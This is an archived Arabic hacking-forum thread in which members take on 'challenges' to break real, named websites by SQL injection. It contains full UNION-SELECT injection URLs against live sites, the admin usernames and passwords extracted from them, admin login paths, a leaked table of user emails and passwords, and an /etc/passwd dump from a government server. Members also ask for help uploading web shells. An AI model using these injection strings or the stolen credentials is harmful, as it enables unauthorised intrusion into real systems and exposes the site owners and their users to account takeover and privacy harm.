:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   تحديات خاصة بالمبتدئين في دورة sql (http://www.vbspiders.com/vb/t31386.html)

marrak 06-28-2010 07:13 PM

تحديات خاصة بالمبتدئين في دورة sql
 
السلام عليكم
لتدليل المصاعب امام المبتدئين , وتثمينا لمجهودات اخينا فولكانو , سأضع كل مرة موقعا مصابا ويحاول المبتدئون ايجاد معلوماته.
الأجوبة ترسل على الخاص وسيم وضع لائحة باسماء المتفوقين .
على بركة الله نبدأ

الموقع الأول
http://www.5landswalk.com.au

مدة التحدي يومان

لكم تحياتي

D-GhosT s3cur!Ty-Z 06-28-2010 08:19 PM

والله مبادرة رائعة جدا منك يا مارك

marrak 06-28-2010 08:40 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة I PROMISE HACKER (المشاركة 159863)
والله مبادرة رائعة جدا منك يا مارك

احاول قدر المستطاع رد الجميل لهذا المنتدى العزيز
لك تحياتي

kama 06-29-2010 12:03 AM

tnaks man , for this chalange

marrak 06-30-2010 08:18 PM

لم أتوصل بأي جواب لكن الاخوة ما شاء الله عليهم دخلوا الموقع وتم ترقيع الخطأ sql .

التحدي الثاني سهل
http://www.hironakajima.com/
نقطة البداية
http://www.hironakajima.com/business...php?mail_id=12

الثغرة sql
الاصدار 5

المدة يومان
لكم تحياتي

coool 06-30-2010 08:36 PM

البيانات اممم
اليوزر stoneusa7
البااس stoned
اماا لووحة ماطلعت معااي هع هع ننتظر الباقين

marrak 06-30-2010 10:30 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة coool (المشاركة 161608)
البيانات اممم
اليوزر stoneusa7
البااس stoned
اماا لووحة ماطلعت معااي هع هع ننتظر الباقين

مبروك عليك اخي الكريم واليك لوحة الدخول
http://www.hironakajima.com/admin/login.php

سأرفع موقعا آخر غدا بحول الله
لك تحياتي

lifenote 07-01-2010 12:24 AM

السلام عليكم و رحمة الله تعالى و بركاته

شكرا أخي الغالي على الفكرة الجميلة كنت محتاج لها و الله

كود:

II-
http://www.hironakajima.com/business/mail

_old.php?mail_id=-12%20union%

20select%201,2,concat%

28table_name,0x3a,column_name,0x3a,tabl

e_schema%

29,4,5+from+information_schema.columns+

where+column_name+LIKE+CHAR%

2837,%20112,%2097,%20115,%2037%29--

III-
http://www.hironakajima.com/business/mail

_old.php?mail_id=-12%20union%

20select%201,2,concat%

28table_name,0x3a,column_name,0x3a,tabl

e_schema%

29,4,5+from+information_schema.columns+

where+table_name=0x75736572--

IV-
http://www.hironakajima.com/business/mail

_old.php?mail_id=-12 union select

1,2,concat

(user_id,0x3a,userpass),4,5+from+user--

النتيجة

اليوزرنام 1
الباس stoned

************
user اسم جدول اليوزر
userpass اسم عمود لاباس
user_id اسم عمود اليوزر
اليوزرنام 1
الباس stoned
*************
يعني اليوزر مستحيل و الباس صحيح

جربت امر غروب و ليميت ما يشتغل معاي يعني قلت ربما اخطأت في الجدول لانه كما لاحضتم الجدول عندي اسمه user

تلميذ كسول خخخ

آسف اتمنى اشوف ردودكم اخوتي الكرام

سلام

lifenote 07-01-2010 01:30 AM

هذا موقع ىخر جربت عليه و نفس المشكلة

كود:

http://accesscourses.net/fr/news_detail.php?id=-1 union select 1,2,3,concat(id,0x3a,pass),5,6+from+client--
1:1609

احاول استخدم أمر غروب ما ينفع يعني يعطيني نفس الجدول الي انا عملت عليه و ما يعطيني جداول أخرى اجرب عليها

marrak 07-01-2010 09:54 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة lifenote (المشاركة 161859)
هذا موقع ىخر جربت عليه و نفس المشكلة

كود:

http://accesscourses.net/fr/news_detail.php?id=-1 union select 1,2,3,concat(id,0x3a,pass),5,6+from+client--
1:1609

احاول استخدم أمر غروب ما ينفع يعني يعطيني نفس الجدول الي انا عملت عليه و ما يعطيني جداول أخرى اجرب عليها

اتمنى على الأخ coool ان يشرح لنا طريقته لأنها صحيحة
بتظافر الجهود نتعلم جميعا ونرقى بمستوى المنتدى .

marrak 07-01-2010 10:07 PM

بالنسبة للموقع الثاني اخي lifenote
اليك المبتغى وجب اسعمال login بدل id
لك تحياتي

marrak 07-01-2010 10:17 PM

السلام عليكم
الموقع التالي
http://www.annapolisroyalwellnesscenterandspa.com
الثغرة sql
الاصدار 5
عدد الأعمدة 5 والمصاب رقم 2

لكم تحياتي

lifenote 07-02-2010 07:40 AM

الموقع ما يضهر لي عليه خطا أخي

^_^

/////////

انضر اخي هنا

كود:

http://accesscourses.net/fr/news_detail.php?id=-1%20union%20select%201,concat%28login,0x3a,pass%29,3,4,5,6+from+client--
هل لي برابط لوحة التحكم ؟؟ او طريقة لتخمينها تكون سهلة لاني اضمن لك انه اليدوي ما ينفع
و حتى برنامج AdminPage


the cold zero 07-02-2010 09:40 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة marrak (المشاركة 161909)
السلام عليكم
الموقع التالي
http://www.annapolisroyalwellnesscenterandspa.com
الثغرة sql
الاصدار 5
عدد الأعمدة 5 والمصاب رقم 2

لكم تحياتي

تسلم يا بطل
انتظرنى راح اجيب راسه n028


BL4CK TIG3R

marrak 07-02-2010 07:41 PM

جوابك صحيح اخي الكريم the cold zero.
وفقك الله لما يحب ويرضى
الجواب
admin:admin

لوحة التحكم
http://www.annapolisroyalwellnesscen...dmin/login.php

لكم تحياتي

marrak 07-02-2010 07:51 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة lifenote (المشاركة 162145)
الموقع ما يضهر لي عليه خطا أخي

^_^

/////////

انضر اخي هنا

كود:

http://accesscourses.net/fr/news_detail.php?id=-1%20union%20select%201,concat%28login,0x3a,pass%29,3,4,5,6+from+client--
هل لي برابط لوحة التحكم ؟؟ او طريقة لتخمينها تكون سهلة لاني اضمن لك انه اليدوي ما ينفع
و حتى برنامج AdminPage


اخي الكريم
انتبه جيدا للدروس
عوض concat اكتب group_cancat وتنحل المشكلة
لك تحياتي

marrak 07-02-2010 07:58 PM

السلام عليكم
الموقع التالي
http://www.amaigabeko.com/
الثغرة sql
الاصدار 5
لكم تحياتي

TheGame 07-02-2010 09:06 PM

اول شي اشكرك اخي على الموضوع الرائع الله يجازيك الف خير ثانيا

تم اخراج اليوزر والباس

اليوزر: delider
الباسوورد: stormfury
وهذا لوحة التحكم

http://www.amaigabeko.com/admin/login.html


وشكرا

the cold zero 07-02-2010 09:45 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 162558)
اول شي اشكرك اخي على الموضوع الرائع الله يجازيك الف خير ثانيا

تم اخراج اليوزر والباس

اليوزر: delider
الباسوورد: stormfury
وهذا لوحة التحكم

http://www.amaigabeko.com/admin/login.html


وشكرا


تسلم يا بطل


وفى انتظار الموقع القادم..

marrak 07-03-2010 12:12 AM

السلام عليكم
اليكم الموقع التالي
http://www.flhsbaseballreport.com/
الثغرة sql
الاصدار 5
المرجو وضع رابط الاستغلال كاملا .
لكم تحياتي

TheGame 07-03-2010 12:58 PM

السلام عليكم


تم اخراج اليوزر والباس بس بصراحة مامتاكد منه لان مافي امتيازات الادمن ؟؟؟؟ ياريت لو تشوفونة

والان رابط الاستغلال

http://www.flhsbaseballreport.com/pl...rom+s_contacts


رابط لوحة التحكم

http://www.flhsbaseballreport.com/coachadmin/login.php






اليوزر: herreraa@dadeschools.net
الباس : cougars


لاكن نريد طرق لرفع الشيل ياريت لو تعلمونة طريقة رفع الشل وشكرا

marrak 07-03-2010 08:05 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 162943)
السلام عليكم


تم اخراج اليوزر والباس بس بصراحة مامتاكد منه لان مافي امتيازات الادمن ؟؟؟؟ ياريت لو تشوفونة

والان رابط الاستغلال

http://www.flhsbaseballreport.com/pl...rom+s_contacts


رابط لوحة التحكم

http://www.flhsbaseballreport.com/coachadmin/login.php






اليوزر: herreraa@dadeschools.net
الباس : cougars


لاكن نريد طرق لرفع الشيل ياريت لو تعلمونة طريقة رفع الشل وشكرا

اخي الكريم
هل تأكدت من صحة المعلومات
لك تحياتي

TheGame 07-03-2010 08:20 PM

اخي في الموقع مكانين لدخول الادمن

هذا واحد منهم
http://www.flhsbaseballreport.com/coachadmin/login.php

وجربته عليه ودخل بس الثاني مايدخل


وهذا الثاني

http://www.flhsbaseballreport.com/directory/login.php

في صفحة اسمه directory طلعت الاعمدة المصابة وهذا هوه الرابط

http://www.flhsbaseballreport.com/di...select+1,2,3--

لاكن union+select عند استعمال يظهر خطا


وجربت ببرنامج havij ييقول انو هذه الصفحة اصدار قاعدة البيانات 4 لاكن ماطلع الاعمدة

هل من الممكن ان يكون في موقع واحد اصدارين


بس الاول الله شاهد انا طلعته بدون برنامج يعني يدوي والثاني لان ماطلع يدوي استعملت البرنامج لاكن بدون فائدة

the cold zero 07-04-2010 12:17 AM

انتظرنى راح اجيب لك الاستغلال كامل

m0h@med 07-04-2010 01:15 AM

Sql helper
بيقول URL is not vulnerable
شوف سكريبت اخر
و الله أعلم

m0h@med 07-04-2010 01:31 AM

http://www.flhsbaseballreport.com/ed...hema.columns--

TheGame 07-04-2010 02:58 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة m0h@med (المشاركة 163403)






؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ smilies9

marrak 07-04-2010 02:35 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 163451)
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ smilies9

username password email
Andy Barkett bubbadog info@baseballpros.net
sissyfig millennium sissyfig59@aol.com
igolf234 right1 arobinson5678@aol.com
mcisme06 dramaomg6 mcisme06@aol.com
goldglove2b ttrryy justin@probaseballtips.com
LockeJET ALEXANDER CHAD.WEISSMAN@AGRIFLORA.COM

marrak 07-04-2010 02:36 PM

السلام عليكم

الموقع التالي
http://www.uidjournal.com/
اصدار القاعدة 5
لكم تحياتي

TheGame 07-04-2010 09:52 PM

تم اخراج اليوزر والباس


رابط الدخول

http://www.uidjournal.com/admin/

اليوزر : [gdwl]ryan@gozipline.com[/gdwl]
الباسوورد : [gdwl]password[/gdwl]


[warning]

<ياريت لو ترفعولي شل على الموقع >
[/warning]

marrak 07-04-2010 10:59 PM

احسنت اخي الكريم
في المرة القادمة , تفضل بوضع رابط الاستغلال كاملا
لك تحياتي

marrak 07-04-2010 11:01 PM

السلام عليكم
بما ان بعض الاخوة يتفاعلون مع هذه التمارين , اليكم الموقع التالي
http://www.opdc.go.th
الاصدار 5
لكم تحياتي

coool 07-05-2010 07:18 PM

تمااارين قاااسيه هع هع
بس نبي نرفع شل عليهااا مدري كيف الطريقه

TheGame 07-05-2010 09:11 PM

اخي ممكن سوأل كيف الاستفاده من هذه

[warning]root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh [/warning]

marrak 07-05-2010 09:18 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 164647)
اخي ممكن سوأل كيف الاستفاده من هذه

[warning]root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh [/warning]

معلوماتي جد متواضعة واخاف ان اقول شيئا انا شخصيا غير متأكد منه .
في انتظار احد العناكب
لك تحياتي

marrak 07-05-2010 09:34 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة coool (المشاركة 164581)
تمااارين قاااسيه هع هع
بس نبي نرفع شل عليهااا مدري كيف الطريقه

حاول ان تتبع دروس الأخ فولكانو
لك تحياتي

the-black 07-05-2010 09:44 PM

أخ مارااك
أخي في كثير من المواقع لما بتريد أن تحقنها ما بتظهر الأعمة ممكن تقول ايش العمل ؟؟؟

marrak 07-06-2010 08:15 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة the-black (المشاركة 164669)
أخ مارااك
أخي في كثير من المواقع لما بتريد أن تحقنها ما بتظهر الأعمة ممكن تقول ايش العمل ؟؟؟

اخي الكريم
تفضل بوضع مثال لأشرح لك الطريقة ان كان فعلا الموقع قابلا للحقن

the-black 07-06-2010 08:35 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة marrak (المشاركة 165464)
اخي الكريم
تفضل بوضع مثال لأشرح لك الطريقة ان كان فعلا الموقع قابلا للحقن

و الله أخي البارح كان عندي واحد و تعصبني و رميتووو

لكن أنا لما فحصته وجدت فيه الخطأ و استخرجت المجال اللي محصور فيه الأعمدة المصابة لكن لما أطبق أمر انيو+سيلكت +
عدد الأعمدة ( 1,,2,3,4........) ما يطلعو الجداول المصابه


ايش العمل في هذه الحالة ؟؟

TheGame 07-06-2010 09:05 PM

هذا هوه الاستغلال الكامل للموقع

http://www.opdc.go.th/english/main/c...cs.admin--+%27

واليوزر : admin
والباس : admin

وهذا مسار لوحة التحكم

http://www.opdc.go.th/english/admin

ياريت الي يكدر يرفع شل ويضع الرابط هنا لتدريب عليه لا غير smilies14


الساعة الآن 02:52 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0